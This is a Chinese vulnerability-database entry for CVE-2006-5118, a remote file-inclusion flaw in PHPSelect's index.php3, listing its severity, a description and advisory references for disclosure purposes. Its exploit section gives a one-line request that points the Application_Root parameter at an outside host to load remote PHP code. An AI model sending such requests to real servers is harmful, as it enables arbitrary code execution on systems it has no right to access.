PHPSelect Web Development 'Index.PHP3'远程文件注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111148 漏洞类型 输入验证
发布时间 2006-09-27 更新时间 2006-10-19
CVE编号 CVE-2006-5118 CNNVD-ID CNNVD-200610-024
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28714
https://cxsecurity.com/issue/WLB-2006100032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-024
|漏洞详情
PHPSelectWebDevelopmentDivision的PDD程序包中index.php3内存在PHP远程文件包含漏洞。远程攻击者通过Application_Root参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20231/info

PHPSelect Web Development is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

http://www.example.com/index.php3?Application_Root=http://www.example.com
|参考资料

来源:XF
名称:phpselect-index-file-include(29223)
链接:http://xforce.iss.net/xforce/xfdb/29223
来源:BID
名称:20231
链接:http://www.securityfocus.com/bid/20231
来源:BUGTRAQ
名称:20060927PHPSelectWebDevelopmentDivision<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/447177/100/0/threaded
来源:SREASON
名称:1666
链接:http://securityreason.com/securityalert/1666